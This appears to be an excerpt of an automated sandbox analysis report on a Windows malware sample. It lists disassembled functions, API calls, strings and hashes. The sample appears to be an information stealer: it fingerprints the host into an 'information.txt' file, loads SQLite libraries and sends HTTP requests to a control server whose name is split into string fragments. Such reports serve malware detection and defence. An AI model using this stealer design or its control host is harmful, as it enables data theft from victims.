Part of subcall function 00091997: CoInitializeEx.OLE32(00000000,00000000,00000030,00093F67,?,AV: ,000B68C4,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 000919AD
Part of subcall function 00091997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000919BE
Part of subcall function 00091997: CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 000919D8
Part of subcall function 00091997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091A0E
Part of subcall function 00091997: VariantInit.OLEAUT32(?), ref: 00091A5D

Part of subcall function 00090C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00081385), ref: 00090C91
Part of subcall function 00090C85: HeapAlloc.KERNEL32(00000000,?,?,?,00081385), ref: 00090C98
Part of subcall function 00090C85: GetComputerNameA.KERNEL32(00000000,00081385), ref: 00090CAC

Part of subcall function 00090C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000813B9), ref: 00090C5F
Part of subcall function 00090C53: HeapAlloc.KERNEL32(00000000,?,?,?,000813B9), ref: 00090C66
Part of subcall function 00090C53: GetUserNameA.ADVAPI32(00000000,000813B9), ref: 00090C7A

Part of subcall function 00091563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00091575
Part of subcall function 00091563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00091580
Part of subcall function 00091563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0009158B
Part of subcall function 00091563: ReleaseDC.USER32(00000000,00000000), ref: 00091596
Part of subcall function 00091563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4), ref: 000915A2
Part of subcall function 00091563: HeapAlloc.KERNEL32(00000000,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 000915A9
Part of subcall function 00091563: wsprintfA.USER32 ref: 000915BB

Part of subcall function 00090DDB: GetKeyboardLayoutList.USER32(00000000,00000000,000B670D,?,?), ref: 00090E0C
Part of subcall function 00090DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00090E1A
Part of subcall function 00090DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00090E28
Part of subcall function 00090DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00090E57
Part of subcall function 00090DDB: LocalFree.KERNEL32(00000000), ref: 00090EFF

Part of subcall function 00090D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00090D49
Part of subcall function 00090D2E: HeapAlloc.KERNEL32(00000000), ref: 00090D50
Part of subcall function 00090D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00090D5F
Part of subcall function 00090D2E: wsprintfA.USER32 ref: 00090D7D

Part of subcall function 00090F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C), ref: 00090F65
Part of subcall function 00090F51: HeapAlloc.KERNEL32(00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090F6C
Part of subcall function 00090F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ), ref: 00090F8A
Part of subcall function 00090F51: RegQueryValueExA.KERNEL32(000B6888,00000000,00000000,00000000,000000FF,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000), ref: 00090FA6
Part of subcall function 00090F51: RegCloseKey.ADVAPI32(000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090FAF

Part of subcall function 00091007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0009107D
Part of subcall function 00091007: wsprintfA.USER32 ref: 000910DB

Part of subcall function 00090FBA: GetSystemInfo.KERNEL32(?), ref: 00090FD4
Part of subcall function 00090FBA: wsprintfA.USER32 ref: 00090FEC

Part of subcall function 00091119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,000B6910,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 00091131
Part of subcall function 00091119: HeapAlloc.KERNEL32(00000000), ref: 00091138
Part of subcall function 00091119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00091154
Part of subcall function 00091119: wsprintfA.USER32 ref: 0009117A

Part of subcall function 000914A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000B6712,?,?), ref: 000914D4
Part of subcall function 000914A5: Process32First.KERNEL32(00000000,00000128), ref: 000914E4
Part of subcall function 000914A5: Process32Next.KERNEL32(00000000,00000128), ref: 00091542
Part of subcall function 000914A5: CloseHandle.KERNEL32(00000000), ref: 0009154D

Part of subcall function 00091203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,000B670F,00000000,?,?), ref: 00091273
Part of subcall function 00091203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000912B0
Part of subcall function 00091203: wsprintfA.USER32 ref: 000912DD
Part of subcall function 00091203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000912FC
Part of subcall function 00091203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00091332
Part of subcall function 00091203: lstrlenA.KERNEL32(?), ref: 00091347

Part of subcall function 00091203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,000B6E8C), ref: 000913DC
Part of subcall function 00091203: RegCloseKey.ADVAPI32(?), ref: 00091446
Part of subcall function 00091203: RegCloseKey.ADVAPI32(?), ref: 00091472

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,000B6910,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000), ref: 00094563

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

Strings

Install Date: , xrefs: 00093ED1
Cores: , xrefs: 0009428E
TimeZone: , xrefs: 000941AC
Threads: , xrefs: 000942EF
information.txt, xrefs: 00094573
[Software], xrefs: 000944A3
Version: , xrefs: 00093B9F
Computer Name: , xrefs: 00093FAD
[Processes], xrefs: 0009442A
GUID: , xrefs: 00093CE1
Processor: , xrefs: 0009422D
Work Dir: In memory, xrefs: 00093E30
Windows: , xrefs: 00093E70
[Hardware], xrefs: 0009420D
Date: , xrefs: 00093C1F
HWID: , xrefs: 00093D4E
Display Resolution: , xrefs: 0009406F
Path: , xrefs: 00093DBB
User Name: , xrefs: 0009400E
VideoCard: , xrefs: 000943B7
MachineID: , xrefs: 00093C80
RAM: , xrefs: 00094350
Keyboard Languages: , xrefs: 000940DE
AV: , xrefs: 00093F3E
Local Time: , xrefs: 0009414B

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 478979899-1014693891
Opcode ID: ab65ee0a1ff790315b426bfd53d9b5cc422ec04b8de4db5ece548db4eabafd88
Instruction ID: 1ae3302dc7137206053552d555a19de41b61caf14567887c3891964d3790d3f3
Opcode Fuzzy Hash: ab65ee0a1ff790315b426bfd53d9b5cc422ec04b8de4db5ece548db4eabafd88
Instruction Fuzzy Hash: DA522E32D4051AAFCF01FBA4DC429DDB7B5AF15300F5281A1AA60B7163DB31BE4A9B90

Function 000969B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000968C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0009691A
Part of subcall function 000968C6: lstrlenA.KERNEL32(?), ref: 00096925
Part of subcall function 000968C6: StrStrA.SHLWAPI(00000000,?), ref: 0009693A
Part of subcall function 000968C6: lstrlenA.KERNEL32(?), ref: 00096949
Part of subcall function 000968C6: lstrlenA.KERNEL32(00000000), ref: 00096962

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00096AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BF0
Sleep.KERNEL32(0000EA60), ref: 00096BFF

Strings

ERROR, xrefs: 00096B51
ERROR, xrefs: 00096BAA
ERROR, xrefs: 00096BC0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00096CAE
ERROR, xrefs: 00096AF1
ERROR, xrefs: 00096BE8
ERROR, xrefs: 00096BD6
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00096CDF
sqlite3.dll, xrefs: 00096C9C
sqlp.dll, xrefs: 00096CCD
ERROR, xrefs: 00096A98
.v, xrefs: 00096D1D
sqlite3.dll, xrefs: 00096C68
sqlp.dll, xrefs: 00096CFE

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .v$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-2870038134
Opcode ID: edf474505aa3d028428d2fd21d76859c4025167cd4f675a2b3c15e1b0d4a27a1
Instruction ID: b1fd4c4f3c7d61a4c780cc8e70bbadb97667cc33a667856f67d3a43317555de1
Opcode Fuzzy Hash: edf474505aa3d028428d2fd21d76859c4025167cd4f675a2b3c15e1b0d4a27a1
Instruction Fuzzy Hash: 9491D471E40118ABCF50FBA4EC47ADDB7B4BF00700F518161FA54BB162DB35AE4A9B91

Function 00081666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00081696
wsprintfW.USER32 ref: 000816BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 000816E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 000816FE
RtlAllocateHeap.NTDLL(00000000), ref: 00081705
_time64.MSVCRT ref: 0008170E
srand.MSVCRT ref: 00081715
rand.MSVCRT ref: 0008171E
_memset.LIBCMT ref: 0008172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00081746
_memset.LIBCMT ref: 00081763
CloseHandle.KERNEL32(?), ref: 00081771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0008178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 000817A9
_memset.LIBCMT ref: 000817BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000817C8
RtlFreeHeap.NTDLL(00000000), ref: 000817CF
CloseHandle.KERNEL32(?), ref: 000817DB

Strings

%s%s, xrefs: 000816B6
delays.tmp, xrefs: 000816A4

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: cb6e10b77524542e000147d16240831f9d62708a1796d8348c9f5a4f3aa105e4
Instruction ID: 421788442c931ce5198872191bfd453d5768e54e360e01b5d3ea86d89f8f7f30
Opcode Fuzzy Hash: cb6e10b77524542e000147d16240831f9d62708a1796d8348c9f5a4f3aa105e4
Instruction Fuzzy Hash: 284184B1900618ABEB206B71DC4DFEF7BBDEF89751F1006A9B10AE1051DA358955CF60

Function 00097041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000813B9), ref: 00090C5F
Part of subcall function 00090C53: HeapAlloc.KERNEL32(00000000,?,?,?,000813B9), ref: 00090C66
Part of subcall function 00090C53: GetUserNameA.ADVAPI32(00000000,000813B9), ref: 00090C7A

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0009858F), ref: 000970DD
OpenEventA.KERNEL32(001F0003,00000000,?,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000970EC
CreateDirectoryA.KERNEL32(?,00000000,000B66DA), ref: 0009760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000976CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000976E4

Part of subcall function 00084B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00084BCD
Part of subcall function 00084B2E: StrCmpCA.SHLWAPI(?), ref: 00084BEB

Part of subcall function 000939C2: StrCmpCA.SHLWAPI(?,block,?,?,00097744), ref: 000939D7
Part of subcall function 000939C2: ExitProcess.KERNEL32 ref: 000939E2

Part of subcall function 00085F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00085FD8
Part of subcall function 00085F39: StrCmpCA.SHLWAPI(?), ref: 00085FF6

Part of subcall function 00093198: strtok_s.MSVCRT ref: 000931B7
Part of subcall function 00093198: strtok_s.MSVCRT ref: 0009323A

Sleep.KERNEL32(000003E8), ref: 00097A9A

Part of subcall function 00085F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0008618E
Part of subcall function 00085F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000861D2
Part of subcall function 00085F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0009858F), ref: 00097100

Part of subcall function 0009257F: __EH_prolog3_catch_GS.LIBCMT ref: 00092589
Part of subcall function 0009257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00097E31,.exe,000B6CCC,000B6CC8,000B6CC4,000B6CC0,000B6CBC,000B6CB8,000B6CB4,000B6CB0,000B6CAC,000B6CA8,000B6CA4), ref: 000925A8
Part of subcall function 0009257F: Process32First.KERNEL32(00000000,00000128), ref: 000925B8
Part of subcall function 0009257F: Process32Next.KERNEL32(00000000,00000128), ref: 000925CA
Part of subcall function 0009257F: StrCmpCA.SHLWAPI(?), ref: 000925DC
Part of subcall function 0009257F: CloseHandle.KERNEL32(00000000), ref: 000925F0

CloseHandle.KERNEL32(?), ref: 00098000

Strings

hopto, xrefs: 00097E9F
.exe, xrefs: 00097549
http://, xrefs: 00097E57
cowod., xrefs: 00097E7B
org, xrefs: 00097EE7
2ee1445fc63bc20d0e7966867b13e0e1, xrefs: 0009770C
_DEBUG.zip, xrefs: 00097F35
.exe, xrefs: 00097E04

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$2ee1445fc63bc20d0e7966867b13e0e1$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-2219833542
Opcode ID: 02b6aee68f4f3b4077802caaa0e00e0db297ad34deaca6d2a608084aadc13994
Instruction ID: 42fa10ba0a1617a814d068bed595c7a5728336931e435005a851d8d30719aab7
Opcode Fuzzy Hash: 02b6aee68f4f3b4077802caaa0e00e0db297ad34deaca6d2a608084aadc13994
Instruction Fuzzy Hash: 2492FC325483559FCA20FF24D842ADEB7E5FF80700F414929F9D867162DB71AE0A9B93

Function 00085237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008527E
RtlAllocateHeap.NTDLL(00000000), ref: 00085285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000852A7
StrCmpCA.SHLWAPI(?), ref: 000852C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000852F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00085330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00085360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0008536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00085394
InternetReadFile.WININET(?,?,00000400,?), ref: 000853DA
InternetCloseHandle.WININET(?), ref: 00085439
InternetCloseHandle.WININET(?), ref: 00085445
InternetCloseHandle.WININET(?), ref: 00085451

Strings

\x, xrefs: 00085250, 00085457, 0008539E
GET, xrefs: 00085325

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
